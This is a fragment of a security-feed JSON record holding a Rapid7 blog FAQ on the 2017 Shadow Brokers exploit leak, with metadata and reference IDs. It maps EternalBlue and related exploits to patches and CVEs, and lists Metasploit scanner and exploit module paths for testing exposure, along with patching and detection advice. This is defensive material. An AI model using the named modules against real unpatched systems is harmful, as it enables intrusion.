href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">please visit this page</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p></div><!-- [DocumentBodyEnd:880a7067-953c-4d86-bb9f-22e02d26586e] -->", "title": "Petya-like ransomworm: Leveraging InsightVM and Nexpose for visibility into MS17-010", "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "_object_type": "robots.models.rss.RssBulletin", "viewCount": 371, "enchantments": {"score": {"value": 7.7, "vector": "NONE", "modified": "2017-08-03T17:21:32", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2017-08-03T17:21:32", "rev": 2}}, "reporter": "Ken Mizota", "bulletinFamily": "blog", "objectVersion": "1.5", "type": "rapid7community", "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://community.rapid7.com/community/infosec/blog/2017/04/18/the-shadow-brokers-leaked-exploits-faq", "references": [], "enchantments_done": [], "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "id": "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "history": [], "modified": "2017-04-18T20:50:20", "lastseen": "2017-05-01T16:52:25", "published": "2017-04-18T20:50:20", "description": "<!-- [DocumentBodyStart:988188db-6fd0-45a3-a3c1-27dc87650c8c] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">The Rapid7 team has been busy evaluating the threats posed by <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Farstechnica.com%2Fsecurity%2F2017%2F04%2Fpurported-shadow-brokers-0days-were-in-fact-killed-by-mysterious-patch%2F\" rel=\"nofollow\" target=\"_blank\">last Friday&#8217;s Shadow Broker exploit and tool release</a> and answering questions from colleagues, customers, and family members about the release. We know that many people have questions about exactly what was released, the threat it poses, and how to respond, so we have decided to compile a list of frequently asked questions.</span></p><p><span style=\"font-size: 14pt;\"><br/><span style=\"font-family: Arial; color: #eb7a3d; font-weight: bold;\">What&#8217;s the story?</span></span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">On Friday, April 15, a hacking group known as the &ldquo;Shadow Brokers&#8221; released a trove of alleged NSA data, detailing exploits and vulnerabilities in a range of technologies. The data includes information on multiple Windows exploits, a framework called Fuzzbunch for loading the exploit binaries onto systems, and a variety of post-exploitation tools. </span></p><p><span style=\"font-size: 10pt;\"><br/><span style=\"font-family: Arial; color: #000000;\">This was understandably a cause for concern, but fortunately, none of the exploits were zero days. Many targeted older systems and the vulnerabilities they exploited were well-known, and four of the exploits targeted vulnerabilities that were patched last month. </span></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 14pt; font-family: Arial; color: #eb7a3d; font-weight: bold;\">Who are these shady characters?</span></p><p><span style=\"font-size: 10pt;\"><span style=\"font-family: Arial; color: #000000;\">The Shadow Brokers are a group that emerged in August of 2016, claiming to have information on tools used by a threat group known as <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fsecurelist.com%2Fblog%2Fresearch%2F68750%2Fequation-the-death-star-of-malware-galaxy%2F\" rel=\"nofollow\" target=\"_blank\">Equation Group</a></span><span style=\"font-family: Arial; color: #000000;\">. The initial information that was leaked by the Shadow Brokers involved firewall implants and exploitation scripts targeting vendors such as Cisco, Juniper, and Topsec, which were confirmed to be real and subsequently patched by the various vendors. Shadow Brokers also claimed to have access to a larger trove of information that they would sell for 1 million bitcoins, and later lowered the amount to 10,000 bitcoins, which could be crowdfunded so that the tools would be released to the public, rather than just to the highest bidder. The Shadow Brokers have popped up from time to time over the past 9 months leaking additional information, including IP addresses used by the Equation Group and additional tools. Last week, having failed to make their price, they released the password for the encrypted archive, and the security community went into a frenzy of salivation and speculation as it raced to unpack the secrets held in the vault.</span></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">The April 15th release seems to be the culmination of the Shadow Brokers&#8217; activity; however, it is possible that there is still additional information about the Equation Group that they have not yet released to the public.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 14pt; font-family: Arial; color: #eb7a3d; font-weight: bold;\">Should you be worried?</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt;\"><span style=\"font-family: Arial; color: #000000;\">A trove of nation state-level exploits being released for anyone to use is certainly not a good thing, particularly when they relate to the most widely-used software in the world, but the situation is not as dire as it originally seemed. There are patches available for all of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fblogs.technet.microsoft.com%2Fmsrc%2F2017%2F04%2F14%2Fprotecting-customers-and-evaluating-risk%2F\" rel=\"nofollow\" target=\"_blank\">vulnerabilities</a>, so a </span><span style=\"color: #000000; font-family: Arial; font-style: italic;\"><strong>very</strong></span><span style=\"font-family: Arial; color: #000000;\"> good starting point is to verify that your systems are up to date on patches. Home users and small network operators likely had the patches installed automatically in the last update, but it is always good to double-check.&#160; </span></span></p><p><br/><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">If you are unsure if you are up to date on these patches, we have checks for them all in <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fnexpose%2F\" target=\"_blank\">Rapid7 Nexpose</a> and <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">Rapid7 InsightVM</a>. <span style=\"font-family: Arial; color: #000000;\">These checks are all included in the </span><span style=\"font-family: Arial; color: #000000; font-style: italic;\">Microsoft hotfix</span><span style=\"font-family: Arial; color: #000000;\"> scan template.</span></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><div class=\"j-rte-table\"><table style=\"border: none;\"><tbody><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalBlue</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalSynergy</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalRomance</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalChampion</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS17-010</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0143</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0144</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0145</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0146</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0147</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">msft-cve-2017-0148</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EmeraldThread</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS10-061</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS10-061</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EskimoRoll</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS14-068</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS14-068</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EducatedScholar</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS09-050</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS09-050</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EclipsedWing</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS08-067</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 5pt 5pt 5pt 5pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">WINDOWS-HOTFIX-MS08-067</span></p></td></tr></tbody></table></div><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">If you want to ensure your patching efforts have been truly effective, or understand the impact of exploitation, you can test your exposure with several modules in <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fmetasploit%2F\" target=\"_blank\">Rapid7 Metasploit</a>:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><div class=\"j-rte-table\"><table style=\"border: none;\"><tbody><tr><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalBlue</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS17-010</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">auxiliary/scanner/smb/smb_ms17_010</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EmeraldThread</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS10-061</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">exploit/windows/smb/psexec</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalChampion</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS17-010</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;background-color: #ffffff;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">auxiliary/scanner/smb/smb_ms17_010</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EskimoRoll</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS14-068 / CVE-2014-6324</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">auxiliary/admin/kerberos/ms14_068_kerberos_checksum</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalRomance</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS17-010</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;background-color: #ffffff;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">auxiliary/scanner/smb/smb_ms17_010</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EducatedScholar</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS09-050</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh, auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff, exploits/windows/smb/ms09_050_smb2_negotiate_func_index</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EternalSynergy</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS17-010</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;background-color: #ffffff;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">auxiliary/scanner/smb/smb_ms17_010</span></p></td></tr><tr><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">EclipsedWing</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">MS08-067</span></p></td><td style=\"border: none;border: solid #000000 1pt;padding: 2pt 2pt 2pt 2pt;background-color: #ffffff;\"><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">auxiliary/scanner/smb/ms08_067_check</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">exploits/windows/smb/ms08_067_netapi</span></p></td></tr></tbody></table></div><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"color: #333333; font-family: Arial, sans-serif, sans; font-size: 10pt;\">In addition, all of the above exploits can also be pivoted to a Meterpreter session via the DoublePulsar implant.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 14pt; font-family: Arial; color: #eb7a3d; font-weight: bold;\">What else can you do to protect yourselves?</span></p><p dir=\"ltr\"><span style=\"font-size: 10pt;\"><span style=\"font-family: Arial; color: #000000;\">If patching is still in progress or will take a little bit longer to fully implement (we get it) then there are detections for the exploits that you can implement while patching in underway. For examples of ways to implement detections, check out <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7721\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2016/11/16/introspective-intelligence-understanding-detections\">this blog post </a>from Mike Scutt</span><span style=\"font-family: Arial; color: #000000;\">. </span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-family: arial, helvetica, sans-serif; color: #000000; font-size: 10pt;\"><span style=\"color: #1155cc;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightidr%2F\" target=\"_blank\">Rapid7 InsightIDR</a></span><span style=\"color: #000000;\">, our solution for incident detection and response, has an active Threat Community with intelligence to help detect the use of these exploits and any resulting attacker behavior. You can subscribe to this threat in the community portal. For more on how threat intel works in InsightIDR, check out this <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Flist%3DPLMrgKzfE1aIN_nurFyggA7Oijqk0uH8VX%26v%3DsmuG6rHGQY8\" rel=\"nofollow\" target=\"_blank\">4-min Solution Short</a>.</span></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">It is also important to stay aware of other activity on your network during the patching and hardening processes. It is easy to get distracted by the latest threats, and attackers often take advantage of defender preoccupation to achieve their own goals, which may or may not have anything to do with this latest tool leak. </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 14pt; font-family: Arial; color: #eb7a3d; font-weight: bold;\">What about that IIS 6 box we have on the public internet? </span></p><p><span style=\"font-size: 10pt; font-family: Arial; color: #000000;\">It is very easy for commentators to point fingers and say that anyone who has legacy or unsupported systems should just get rid of them, but we know that the reality is much more complicated. There will be legacy systems (IIS 6 and otherwise) in organizations that for whatever reason cannot just be replaced or updated. That being said, there are some serious issues with leaving systems that are vulnerable to these exploits publicly accessible. Three of the exploits (&ldquo;EnglishmanDentist&#8221;, &ldquo;EsteemAudit&#8221;, and &ldquo;ExplodingCan&#8221;) will remain effective on EOL systems and the impacts are concerning enough that it is really not a good idea to have internet-facing vulnerable systems. If you are in this position we recommend coming up with a plan to update the system and to keep a very close eye on the development of this threat. Due to the sophistication of this tool set, if widespread exploitation starts then it will likely only be a matter of time before the system is compromised.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 14pt; font-family: Arial; color: #eb7a3d; font-weight: bold;\">Should you be worried about the Equation Group?</span></p><p><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">T<span style=\"font-size: 10pt;\">he threat from Equation Group itself to most organizations is minimal, unless your organization has a very specific threat profile. Kaspersky&#8217;s initial analysis of the group lists the countries and sectors that they have seen targeted in the past. This information can help you determine if your organization may have been targeted.</span></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 10pt;\"><span style=\"font-family: Arial; color: #000000;\">While that is good news for most organizations, that doesn&#8217;t mean that there is no cause for concern. These tools appear to be very sophisticated, focusing on evading security tools such as antivirus and generating little to no logging on the systems that they target. </span><span style=\"color: #000000; font-family: Arial; font-style: italic;\"><strong>For most organizations the larger threat is that of attackers co-opting these very sophisticated and now public exploits and other post-exploitation tools and using them to achieve their own goals</strong></span><span style=\"font-family: Arial; color: #000000;\"><strong>.</strong> This increases the threat and makes defending against, and detecting, these tools more critical. We have seen a sharp decrease in the amount of time it take criminals to incorporate exploits into their existing operations. It will not be long before we will start to see more widespread attacks using these tools. </span></span></p><p><span><span><br/></span></span><span style=\"font-size: 14pt; font-family: Arial; color: #eb7a3d; font-weight: bold;\">Where should I build my underground bunker?</span></p><p><span style=\"color: #000000; font-size: 10pt; font-family: Arial;\">While this particular threat is by no means a reason to go underground, there are plenty of other reasons that you may need to hide from the world and we believe in being prepared. That being said, building your own underground bunker is a difficult and time consuming task, so we recommend that you find an existing bunker, pitch in some money with some friends, and wait for the next inevitable bunker-level catastrophe to hit, because this isn&#8217;t it.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"color: #000000; font-size: 10pt; font-family: Arial;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7842-66217/Build+a+bunker.jpg\"><img alt=\"Build a bunker.jpg\" class=\"image-1 jive-image\" height=\"420\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7842-66217/746-420/Build+a+bunker.jpg\" style=\" width: 746.132px;\" width=\"746\"/></a></span></p></div><!-- [DocumentBodyEnd:988188db-6fd0-45a3-a3c1-27dc87650c8c] -->", "title": "The Shadow Brokers Leaked Exploits Explained", "cvelist": ["CVE-2014-6324", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "_object_type": "robots.models.rss.RssBulletin", "viewCount": 495, "enchantments": {"score": {"value": 6.0, "vector": "NONE", "modified": "2017-05-01T16:52:25", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:99E0CDF8-533A-4B89-A7F9-F0D8EB5BF55B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-22979", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41915", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:35474"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310804799", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389", "KB3011780"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/KERBEROS/MS14_068_KERBEROS_CHECKSUM"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS14-068.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "rapid7community", "idList": 